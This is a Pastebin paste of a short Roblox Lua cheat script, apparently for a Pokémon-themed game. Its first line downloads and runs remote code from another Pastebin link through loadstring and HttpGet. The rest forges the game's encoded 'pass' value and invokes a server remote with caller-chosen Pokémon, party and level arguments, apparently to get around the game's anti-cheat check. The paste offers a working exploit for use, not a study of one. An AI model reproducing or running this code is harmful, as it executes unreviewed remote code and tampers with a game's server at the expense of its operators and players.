Advertisement
regdfg

Untitled

Aug 22nd, 2019
4,193
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. loadstring(game:HttpGet("https://pastebin.com/raw/8qrgSuaU", true))()
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8. _G.PlayingCheckers = function(pokemon, party, level, leavethistrueiguess)
  9. local Encrypt = function(CodeSource)
  10. local StringCode = '';
  11. for i = 1, #CodeSource do
  12. StringCode = StringCode ..string.char(48)..string.byte(string.sub(CodeSource,i,i));
  13. end
  14. return StringCode;
  15. end
  16.  
  17. local pass = Encrypt(game.Players.LocalPlayer.Name..level..pokemon)
  18.  
  19. game.ReplicatedStorage.REvents.Pokemon.iwillknowXD:InvokeServer(pokemon, party, level, leavethistrueiguess, leavethistrueiguess, pass)
  20. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement